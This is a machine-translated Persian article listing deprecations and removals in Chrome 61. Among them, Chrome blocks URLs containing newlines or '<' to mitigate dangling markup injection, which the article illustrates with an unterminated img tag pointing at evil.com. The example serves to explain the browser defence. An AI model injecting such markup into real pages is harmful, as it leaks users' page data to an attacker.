این صفحه به‌وسیله ‏Cloud Translation API‏ ترجمه شده است.

لغو و حذف در Chrome 61

Joe Medley

تقریباً در هر نسخه کروم، شاهد تعداد قابل توجهی از به‌روزرسانی‌ها و بهبودها در محصول، عملکرد آن و همچنین قابلیت‌های پلتفرم وب هستیم. این مقاله لغو و حذف Chrome 61 را شرح می‌دهد که از 3 اوت در نسخه بتا است. این فهرست در هر زمان ممکن است تغییر کند.

امنیت و حریم خصوصی

منابعی را مسدود کنید که نشانی‌های اینترنتی آنها دارای نویسه‌های '\n' و '<' است

نوعی هک وجود دارد به نام تزریق نشانه گذاری آویزان که در آن از یک URL کوتاه شده برای ارسال داده ها به نقطه پایانی خارجی استفاده می شود. به عنوان مثال، صفحه ای را در نظر بگیرید که حاوی <img src='https://evil.com/? . از آنجایی که URL هیچ نقل قول پایانی ندارد، مرورگرها نقل قول بعدی را که اتفاق می‌افتد می‌خوانند و با کاراکترهای محصور شده به‌گونه‌ای رفتار می‌کنند که انگار یک URL واحد هستند.

Chrome 61 با محدود کردن مجموعه کاراکترهای مجاز در ویژگی‌های href و src ، این آسیب‌پذیری را کاهش می‌دهد. به طور خاص، کروم وقتی با نویسه‌های خط جدید ( \n ) و کمتر از نویسه‌ها ( < ) مواجه شود، پردازش URL‌ها را متوقف می‌کند.

برنامه‌نویس‌هایی که استفاده قانونی از خط جدید و کمتر از نویسه‌های یک URL دارند، باید از این نویسه‌ها فرار کنند.

قصد حذف | ردیاب Chromestatus | اشکال کروم

Presentation API را در زمینه‌های ناامن منسوخ و حذف کنید

مشخص شده است که در مبداهای ناامن، Presentation API می تواند به عنوان یک بردار هک در مبداهای ناامن استفاده شود. از آنجایی که نمایشگرها نوار آدرس ندارند، از API می توان برای جعل محتوا استفاده کرد. همچنین امکان استخراج داده ها از ارائه در حال اجرا وجود دارد.

در راستای همسویی با قصد Blink برای حذف ویژگی‌های قدرتمند در مبداهای ناامن ، ما قصد داریم پشتیبانی از API ارائه در زمینه‌های ناامن را منسوخ و حذف کنیم. از Chrome 61، PresentationRequest.start() دیگر در مبداهای ناامن کار نخواهد کرد.

قصد حذف | ردیاب Chromestatus | اشکال کروم

جاوا اسکریپت

تعریف خصوصیات ایندکس شده در ویندوز را ممنوع کنید

قبلاً برخی از مرورگرها برای تخصیص جاوا اسکریپت مانند موارد زیر مجاز بودند:

    window[0] = 1;

مشخصات فعلی HTML اشاره می کند که این یک نقض صریح مشخصات جاوا اسکریپت است. به این ترتیب، این توانایی در Chrome 61 حذف شده است. از فوریه 2016، فایرفاکس از قبل مطابقت دارد.

اشکال کروم

استفاده از اعلان‌ها را از iframe‌های ناامن حذف کنید

درخواست‌های مجوز از iframes می‌تواند باعث سردرگمی کاربران شود، زیرا تشخیص بین مبدا صفحه حاوی و مبدا iframe که درخواست را ارائه می‌کند دشوار است. زمانی که دامنه درخواست ها نامشخص است، قضاوت در مورد اعطای یا رد مجوز برای کاربران دشوار است.

غیرمجاز کردن اعلان‌ها در iframe نیز الزامات مجوز اعلان را با اعلان‌های فشاری هماهنگ می‌کند و اصطکاک را برای توسعه‌دهندگان کاهش می‌دهد.

توسعه دهندگانی که به این قابلیت نیاز دارند می توانند پنجره جدیدی را برای درخواست مجوز اعلان باز کنند.

قصد حذف | ردیاب Chromestatus | اشکال کروم